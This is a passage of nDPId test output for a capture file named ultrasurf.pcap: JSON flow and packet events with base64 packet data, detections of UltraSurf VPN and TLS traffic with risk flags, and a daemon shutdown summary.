sKnakfj\/2CY9hTzppyXRIIMYoyhCThF4ViWWG951XQxJX59hIiJ0P800Ff7a\/5G5VD7ycCukCJw8TO+sLeaHNh0quy2GVip7vE7h6qblNGu0Gk9cK51FTnAHXCv6Q3d4ELba6G4KCOUY3W0JffhWzAOEmTJXAEn\/AlMO2rWx\/k5N9xej0nT\/nkreUz1f1WDVQX6TVNBY\/eRFDtb+TFH+sKdpkHf7qxhfQFxyqkO3FqpeLRYLb2aGXgnvyumtFIbL1yK2alLZq7VfOIertUcgFGWCflf2oGAQMP494aoiJeNdkUmDGGagS7Z55kvWOGnhHAq7vsPk2kKAjsA1WiALpxOUCeufBXfydppP5eHVnoy28uj69BNxwot9pZUkBBYCeXDj3oFR7Gc9bpRrdMTyafPDB90bcnb3nOWmeh6KPFWxajHcXo0ahl0atfQ0xcfDpv70YkPiVHvN5anji\/jwqd+wJMI02C2CHQYt0A0s
b9htNsGJTYmz+qMEhhQgck9uTTyfTQQdK6\/Wo8Rw4c2ys8Ejy8JuJwmtCvHILWdrH8t+XzmYUjHgSjqsA2HLkDPFRZ\/NnGE1jWIEHA1mz46FdQt2Rz4VpbzOBlhqXfDAGkgWEXCyxg9Xt27URhieFz2k6YtWj1FBxrzsegVYDqhgLu95Xv61CBvesoUlZ9xj6Kl4Yl3DHrSrHkP69714VHd12KjEfy7I6PDUSEKGOgsDz2k3gWEz1Vc+5H98dopHMlCP13Yfv0lgLia4AI9tg03z8EoOpAEtDjYmJC8jyZR7z8MFAqjVJ+KlRi7Va6lXMgiTy48noI4EJnp+d3YCu\/TvYdatO\/n8f0FwyP3cI7Bw1wJQYGLb8BE+1FxjfVZo1\/FCFmY5z5t2vZ1fLUc8VgQCCrdPI9Reqj0rAEBhJQzYhyyrI5sO+d0uUiZm1ZjMrsAuR1R+D8ViDPDKJgNTF+lFzmzRvVhWOwiVB62wQx0H1nuzBWVrJnVTyu3Td+HivoL56Fmw46FaLO5cqZKJ4kdrfcT7dOr5SBNdiyjnF7hS41D6qjd1GwoYClOmY65UzGvO\/LpJXnZXNNzcmlebgMFy797BQ5WUmd7VC5FdTGCC8DMqElgFA+rp3WoHjwFyoua2tPfKAEOcMjf\/DXXePwU3Ik4UHmQADTzoJAa9I3MJkafNrUiyVVonoJubGqfmrjkZSA4gDie37sGxEUI86ocE60tLrdZB+SyKA8DHTfOJ4ywPWXCzMMHVfSQPr7V\/TcVQus\/74nuldXt48tcQWezCEyjrk4wEup0Xxil5tfRt81R5SKnXiLTQKHEZIf0HqSXIESqul3tuehmW4c9Q1wxJPZqqhjadeeubZ0gIjhZ9hs9B\/6aDfWtslbETpt0Jbd\/Ri0xqEdLzsqFyIafwtncy88mYnLcalIh0rBtSJuU\/LhKGCkVIE+gUPPF1DbTYZY4YKEaeb+2qo\/\/JDj6zwXltjrJPllzgJKQNGUCykc5KZO1hlo311el8xzVEOheb4BzRB9rrUaDmjaCVi8CyuEyMO5b2YxxWHzBzuZCfmdbLRqSQLyu+LSzVRqFA+T79T7kHNu3xGMSCuKVSsG2pREebnblNVGkCfubEdGKnPL686GbKWglEv7v2CfHncHfVZct\/s0hHAbjxQUdnfLXoTISdI7+bsxXb+ra8Q\/1RtrRBVzu+48UJKnUfoIM1auofVab2EM52OgI1cJXu8rWam94puZzFKEWGHN5jrPhx\/1njYeBqUbgiSNKRjjW+fz8xMBFQ5gSSCk0oalrdEbE7BnRoIdN\/vRg9D\/N51B7MdkbJ2Gmv55poGFAMgIExvo2B\/JlYaCIHgXg41f0\/LPeqrMcFhe2j5UYCpb3n2IzOKezh\/TS0GI0iMwrY1GP7aVptjhYXhhys7MA9TMX9mjk30oA5Li3Yeg25blNJqeDxKu+vxwlNbxqOKs86fBSxzrYDDpnNu5QdAQ7sboEki75xxiMB7G2qxumkThEE3WMNP1TP2cyPa+KzTwAEUydo7dmB7r1BYVlH445Zqui\/gQ9B7FCwh5ykQiRlEVepOqNbbaYU6jrc3JQmu9yNVQ516c7KEY3PmTJGfIomYYQCg0xQ64qJbX+Ng2D40mseTOcV\/nfh\/lZ1gI1tQQr6VxcSHohyQ0owuuvE7GS\/s9KhqIZNKrqD7fH3CftARHmTYUxtD5t+c+oO0QyPgfXcmsUaQ277fzvTac55sC8LTxTlb6qQ6lTQ9Jxj5AhKLanf25vF3ivpTZoHcf\/UbFC7yAm1PT5k8IxbUybglXXWOr+hDrIncmBDz99Gq0DNEyl2Sk\/khhOFsvG2taZ4rfI\/Iq+r72y5uXdniCSx0ABH9OlSRvpo\/6aASUseGq305nqAhb9HZEY9zmIB4WBYmNdv2m2FQvjwfqskoI3NcL8wSS92+WJiP"} 
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656652731609,"flow_last_seen":1656652731609,"flow_idle_time":7580000,"flow_min_l4_payload_len":2576,"flow_max_l4_payload_len":2576,"flow_tot_l4_payload_len":2576,"flow_avg_l4_payload_len":2576,"midstream":1,"thread_ts_msec":1656652731609,"l3_proto":"ip4","src_ip":"65.49.68.25","dst_ip":"10.132.0.23","src_port":50053,"dst_port":37898,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"UltraSurf","breed":"Acceptable","category":"VPN"}} +03963{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1656652731609,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2646,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":2646,"pkt_l4_len":2608,"thread_ts_msec":1656652731609,"pkt":"zBr67JUAcGlaOmiJgQAAyAgARQAKRM7vQAA3BtrfQTFEGQqEABfDhZQKC2ONCUpUkTKAEAFmmhsAAAEBCAom3sgHA1a0\/YkZzIRfJcoGEDhjun+5RWZFRHORheFaka9qWEEqwSnKRQ8+fGAhhFa7EN5cpLsXBaX2yHZz8DtP4L0FIaDBHwFd5rA4GP5cmI7bfwLgg4FVeGP7SjUTC6qb+HQHzgd9GKJejKikQgtNuMoyW+WltSykS7MMuwC9XmFm880JdkonHY1odOp0bZesqC0Ef58K3CfEAwAV1rHerMtEb3ZHcVOr9dSu4VHvVdRPp+8WfCOtT114DN9xODhN5xizXNsKGb1Vqn77M3rN9osNOzf3tytH8Pevd1aIgf3Sm6YXA7VR5D7dvmhs0FN4QC+LDtkE\/6thA0uo\/lnZqMEIHcwUsGe918WbIwSGOk2MJbaAbJZUODyOfxe+T03WsJGCGLuDQ0m7AsMClrqgh8OHbm5U9HMCsMr4h4pvEhR0z2I+R7A\/GAWfQ1Lv84asTQ\/KcjVoTGNO\/qR9qnBDPz02vpUg0t1qIn5OZjHUJc1XlP7bcvV\/wKw3OfG2mX63GGvc7i7QZES09OVvvvQOx27EiD1xANcAMElPBG4AZ\/1ImDDO55WnYWPfINUR0Htt3CDZHS99b7xjoML0TE0baQJ3Jm38p3DdfsEGrsmIokmWO1TpdGRxB4MJLY3wn7Tw4tqDNqBMVruqsIN3XOP1je5K4jtfip7MN5mhXqQwq26JbXu4RN0QZgBwifB\/DFQoswvG8No+jWGMXSh9v0kJl9fw8bhx9lZpA3tQmLgRL3sOqJAHaqHBZRkJhuHh+Rjm\/6hTfFQ00ehtauLThf9ezdb2uY49gvz2DGebsNmTjFsOx+X4R9hsdpnezkh4aEpX5uL1bXi1H6uS64VjoFNEDHQpZ+3uZrYCm
JilgBV0bv0nVghQl4kU33Pf7GIoPZuXhIQfS9VrHsdHbZpH1PU8M\/9PRmRmYlmeapu7XEZp4CzDGYPDSedJ8vQLqPyHzVwGcjHckBVdpjNiPAG5UPQoZ3wCl\/PxEywufemrmfmR\/5AqOpW8\/Wur6zMxw5YPRRe\/bygJ0G9Yqw0LVPvEBxGwFY9uVVI6IGaHAasiMKQLbkze7bdXM6QNfYFDnbbaxoOEV8QDh7YIhuz4gfbAW6eyQbJT2jQKjEHkd0tMaupNho4gKsMUwsj4nZlzTYJVJpDMcLimISegAqBKQ4i8foUUKiadz6eosf+e\/Jex37VfE+krt3zlcpISr8HTnFM1USFF0+9ct3a5KjyNHIWXBbdEjluidEueiRiWyxf4cTH4FbCD2xO9GNRkq9QZppurtJaFbRjXCrw9UUutzbcN9EQ4Cq+gKBSyYXwmUbkSGOLO9rE323nvwyvDcYVdrUsP+BGDklMzvNUHuJnRFouZ1R0WCXxlJrCNrMkgI+iuTt0BJzGXzfEkqc7fmNoiossOF4BZK08wWnsMWJPMsI5Aw3iU49xeiNCj74DW2jR92gY79iEsFrre1ny3NbSwl8EGB091wIYQyL7Ho3Xf3P3gT7nJkJZVIupHy1AL3OnXFLu0aQ9jZogZz0sFxzcPAzim0\/TD+aEJKEn3h1ZCM0dvkLQLeFEGKVhxypzfJLDO0hydYwloEETx3qJaVHzqs8Wq+SgnnsMzDPiMy\/H9mXbpWFOmZUY8c+RgPNNwEPY9sWGgREkghLZgVI4BmbR+1He8AIC\/Jqb6\/fZGK9Su8InqtBz4VDwmCvVjB5VmwRYgEff9Co9KEAKioF+rxsp7jx4CUT\/dUpBgwtPw1AAqwXhQ\/uIBWqnOLtB+sJapVDGqCd6YbeW67lUJtDoMU8VaKm8fednX12fDvla7u1M+CXOyIf\/4rq46zKsHemwKXMSG27KxCoqvfpu2RFyDoNiwIkywHe+mu0KXU6r0uKXXuXHjcqE1XT+Ol42P4hE1aTwsVJT\/aLRIVQDwKL6IhfLinh4zf9x0O\/I\/C1GeMvABe16jJTVzGkcz49endJCMetsRgtWR7oSOwEn5bVIocg8jZsCjdrwEvd6kjZWMsRgHhtbLq+aU27mgxUfacXWiiGTsT33DZFYnj2Gbfgh1MUmZNuxbwGQK74YsSlD8+37pnUDCdBxPu+Gf64VQKHxJ9RtZ7tBvjcOGhEiQQM2Bqm9+kC5dGL6whXOTdBD0aHE3e3jNhysBJXeznMxXLuH5BpQBNhY+pGCD36HH\/gl2POk5EvjD5emciTPfEvMoX\/pO1twUedLTeXtt4V8bNumuTzdRWus9vZCGnaJKWYY+IluLtxDKaBHhULnRKPZr7a3fqY4eZZWnvSv+6SyQfi\/guF4IkYLhqf3LM1QbKUpuoYVTCXDg\/iejAGelMIOMZk\/34eSGVjsk9H4ZDrbf+Wviyu10e\/3LGX4vZqXdNId0qCEAQQsb5bj67rIpqEUfO1gjj68uRkOWA5pTXz1Cw5OGMJDODQJgEJUgUxpgbiqUn1yGaEKOOaiaN2Vv5\/u+w6mqQni+gBiA0+4K0zEMbn8XRxSib6SxlyLQVFPK3+8NFm9X2am1AtSH1\/PoCM1+A0L4I8UddMiaV4KJVbD4gIsbkZTEL2rNpB7+3TEPLkz\/oWqgDlYpiSJoug71nGWFcD+HEERUlO5Z93B7c4XWme9gT2XSraJ9EGS47MTy8E5gSuzHgT06aAD1VDe0EzdVIhzO6QfLKRVyqK\/DkDAcF1dU\/CysJQuLXO26HE1qiZstmUL\/PmaIF1CAre3aq1TiBtKi47RcAusmfTZViQ5pBnP52RilqIkeFHO7qJ+Xe7UbBid1eckGMDShESIKSMkg323ewkUsCQrdbbCQCNxMP\/vovWIiozrHVfadoXMR1+s3vDeGvdijxN0cQlXKhRXEHz1q9AFZPP6O
vHtyaigQOx7Av7+CCavPWtRnhVyR2jLsjvU\/P8W5IFa8Qs0a8CJRQpkCWniRyCA3gsdHuiU5LPzN9N6ilFVKYWl8zCdx1E0DuWVnebVHPp\/mSPBcwJb6Kn0mZE5F6Slv4ios+F0zFBa\/+ONDhj8YI3D0pzybuWoGGURZpxxZvXyeMYFUqAzWQpmxOYCpDyYaRzpVXybXDJxWUfNGwmd6Ve5t6JHTxK332fJRagMHTraU5uEpzRuAnBCqVX\/orlzGUbI38lDmfktCRZhIZ0TA4WOuMezAS\/U5UeZ\/Ky36Btzeqc\/GtSNTwfx5pintfeIcHnEiV69AT2a7sR3PISNs\/w0efL492At330L6CabtPqbX+3L9tP+74e7pNSOxbl7oi\/mRnKkb9k8n2BH6yIJJt5VxxH74+2OAUxERThSHVZlYSiPBPktL4R30L859p0z2Uz6qmrKoN1is1fQXX8xGHOr7PkuLtDJqwFDVFJJ9YkA7Dx2pq++TaR\/9pl4AeqnylRZtWT3EJRF\/MYY3nnisHit78gzVET6d1BuDKtwoAyw4mKyfoqWDMp6JOacbgYmXKL3bRC0doX8dbGOchwnFREadeVLCi\/Q5"} +02216{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1656652731631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1358,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1358,"pkt_l4_len":1320,"thread_ts_msec":1656652731631,"pkt":"zBr67JUAcGlaOmiJgQAAyAgARQAFPM7xQAA3Bt\/lQTFEGQqEABfDhZQKC2OXGUpUkTKAEAFmw0YAAAEBCAom3sgTA1a0\/SxS3iaqHGBX0a8rgr8EFwZv7fbGR3LsZjVMCYTlteWImHMg7dpDQx6QAkVSKrBDRWsAgkFKUO9XRHQzEdcVJv+Jk6+iQYy27OR2Ruv0q0NyJCK8q8neLYQxD7xGx95YziHhCPmx+v2VJKWqXvo5pekBzrhigp\/0TmX3aYQplVTgwksBVP1wSVYSvnxpw4x3MGHY6EK1PhkChr6I2QaCOOskNMVQXjje52Gr0TD6cnIJniT0zvgTXSdGXH4d1pNmH6VI38eKJmR97TCaHW4VbObiULCNV965z+H0nCojIGmrzSNlYRkWatbld8Zbak+Ve9Ye2qFSUfesBybrU8MPKChWDS4szas\/0\/+O+hp7fTEBfmCOnTwpeZ+9ckDlu30IjD3klrlcZcGx59JJ23VaL3mRHXN2m7OYXYqgEUyKkpkk87MSdGKaT3iv+xeB8fdAD0S5iESPxvCatNGVxlnPWQC6LE2Mwk\/UPzo8wmxmWU\/4g2SzkG6fIhc2KfKoBTSS\/18XObBYhTCKn8tmchtQQnCFEhJwUqNPVQHAM7VWv97\/MrpK1Gg3ow57h3u6bsT3zD+7JqhTzfzSb+JLf+gPPuPmKrDBND362h9HtUe4u54hmK0emiAYbKHemgqk5ObUECg98wBR8GbmhEjkgqd5l9MpJjXEnZd7YjYb9HqCPVuTVofELhtwiquLU41YKvkqj9qHY3i83C4I5rsGWBIQz9jCnG\/LAO0gc+K5MhM0jD8w9afyXqZxxIWbvFCzYdvaAxFsd+dbs6QyAzMjBlRwZZJGoKCRudoGu78iGcHZ9v4JjFh8PqFI5RKE50MXupgqZhn5s+mncV4ED4BR62InyQMO+2lSV8XApXho3jZD2BZYaHL8BxzViM2A
nSYU40nV5P\/9Zcawh1bVQjVPNsaeHWxMJc5P+uhgQ7yN5cDddbbbFops91CwGboz\/Y\/iUMqNL+Au752094lP9CLdBHTtF0nwGndsTr7PXV2am5lVFY+07I13Rnwh96VlnzAEErq6QUJMFpXVjoILKF75mfhkzufc5ww1btEyyIToFedBu8inrM2nSfVR4GSH1acVyxGJN\/xPMqMoz7qX11hSlDnDNA70XCXcPknSvGQJeC42YvRZuyBXR4bSZJpW3uxAIMisVpx8HuvqUlRDvWeTkl\/KlLkLPqVG6A7V9IJ4CzPp2LGxX0mxIii\/hq8qrdBvVjXBSMG2kFGd1Gk2CYKUDdUedzWwHbeA+x19\/Z8W9DscgX5Ingwo9qBoCIrSYVEyo5A+Bu6P2A6MYai8bIL3N1ixp0uHekzl1S5Y5ONHOtGVOFVnwRx49hvB6HPO9wc0rIJSIsq9YnBJNWgIZNFkCjlBnZHso+vfBKU6hgL+4B1v8gJk8\/+OinGcG00MXqyjoV0hIPvX8fcu6dH9TclFMmJS42m7WMCCPvMCk17qoAwiC5hrfwamrAiYI\/PEcMUUmJwNoLE7aKVZ7926CN5wXkVGlgQDYNSoxPqXoHqtbU6arZQtfgfxuD27lKKUbZm7keaLAlr7T5d0Wedi07GEwl0yp+Np4OWX5kU2Sgn3juSmnKnaCzCcLk2W4PsHrD6xcXA4Ni176mRo2kV4lUcSZ9ReNwImdlBbdKoXwKkzjV8Aa0hRPMOK2kTBCfB1GhE91TGa9BbzjtvK4JbGfzJcCXKDHd6qGUGMR+lTKBl2gIfVx9fr7SRFiR3Ky\/s="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2962,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656652778161,"flow_last_seen":1656652778161,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1656652778161,"l3_proto":"ip4","src_ip":"10.132.0.23","dst_ip":"65.49.68.25","src_port":38120,"dst_port":50053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2962,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1656652778161,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1656652778161,"pkt":"cGlaOmiJzBr67JUAgQAAyAgARQAAPJe\/QAA\/BhQYCoQAF0ExRBmU6MOFszN1DQAAAACgAv\/\/UcYAAAIEBVAEAggKA1bisgAAAAABAwMI"} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2970,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1656652778372,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1656652778372,"pkt":"zBr67JUAcGlaOmiJgQAAyAgARQAAPAAAQAA3BrPXQTFEGQqEABfDhZTovxOnA7MzdQ6gEnEg1IYAAAIEBYwEAggKJt9+2gNW4rIBAwMJ"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2974,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1656652778421,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1656652778421,"pkt":"cGlaOmiJzBr67JUAgQAAyAgARQAANJfAQAA\/BhQfCoQAF0ExRBmU6MOFszN1Dr8TpwSAEAFXcrgAAAEBCAoDVuLwJt9+2g=="} +01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2975,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1656652778161,"flow_last_seen":1656652778421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1656652778421,"l3_proto":"ip4","src_ip":"10.132.0.23","dst_ip":"65.49.68.25","src_port":38120,"dst_port":50053,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","ja3":"b592adaa596bb72a5c1ccdbecae52e3f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01171{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2977,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1656652778161,"flow_last_seen":1656652778641,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1288,"flow_tot_l4_payload_len":1805,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1656652778641,"l3_proto":"ip4","src_ip":"10.132.0.23","dst_ip":"65.49.68.25","src_port":38120,"dst_port":50053,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"b592adaa596bb72a5c1ccdbecae52e3f","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7468,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1656652831434,"flow_last_seen":1656652831434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1656652831434,"l3_proto":"ip4","src_ip":"10.132.0.23","dst_ip":"65.49.68.25","src_port":38152,"dst_port":50053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7468,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1656652831434,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1656652831434,"pkt":"cGlaOmiJzBr67JUAgQAAyAgARQAAPDStQAA\/BncqCoQAF0ExRBmVCMOFn9EiagAAAACgAv\/\/g5YAAAIEBVAEAggKA1cWxwAAAAABAwMI"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7491,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1656652831643,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1656652831643,"pkt":"zBr67JUAcGlaOmiJgQAAyAgARQAAPAAAQAA3BrPXQTFEGQqEABfDhZUIPEwzlZ\/RImugEnEgLEwAAAIEBYwEAggKJuBPGgNXFscBAwMJ"} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7496,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1656652831673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1656652831673,"pkt":"cGlaOmiJzBr67JUAgQAAyAgARQAANDSuQAA\/BncxCoQAF0ExRBmVCMOFn9EiazxMM5aAEAFXyn8AAAEBCAoDVxcDJuBPGg=="} +01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7499,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1656652831434,"flow_last_seen":1656652831673,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1656652831673,"l3_proto":"ip4","src_ip":"10.132.0.23","dst_ip":"65.49.68.25","src_port":38152,"dst_port":50053,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"b592adaa596bb72a5c1ccdbecae52e3f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01171{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7502,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1656652831434,"flow_last_seen":1656652831894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1288,"flow_tot_l4_payload_len":1805,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1656652831894,"l3_proto":"ip4","src_ip":"10.132.0.23","dst_ip":"65.49.68.25","src_port":38152,"dst_port":50053,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"b592adaa596bb72a5c1ccdbecae52e3f","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8142,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2971,"flow_first_seen":1656652731609,"flow_last_seen":1656652778381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2576,"flow_tot_l4_payload_len":2764868,"flow_avg_l4_payload_len":930,"midstream":1,"thread_ts_msec":1656652839654,"l3_proto":"ip4","src_ip":"65.49.68.25","dst_ip":"10.132.0.23","src_port":50053,"dst_port":37898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"UltraSurf","breed":"Acceptable","category":"VPN"}} 
+00923{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8142,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4525,"flow_first_seen":1656652778161,"flow_last_seen":1656652831683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2576,"flow_tot_l4_payload_len":4386409,"flow_avg_l4_payload_len":969,"midstream":0,"thread_ts_msec":1656652839654,"l3_proto":"ip4","src_ip":"10.132.0.23","dst_ip":"65.49.68.25","src_port":38120,"dst_port":50053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00921{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8142,"source":"ultrasurf.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":646,"flow_first_seen":1656652831434,"flow_last_seen":1656652839654,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2576,"flow_tot_l4_payload_len":336442,"flow_avg_l4_payload_len":520,"midstream":0,"thread_ts_msec":1656652839654,"l3_proto":"ip4","src_ip":"10.132.0.23","dst_ip":"65.49.68.25","src_port":38152,"dst_port":50053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":8142,"source":"ultrasurf.pcap","alias":"nDPId-test","packets-captured":8142,"packets-processed":8142,"total-skipped-flows":0,"total-l4-payload-len":7487719,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1656652839654} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 8142/8142 +~~ skipped 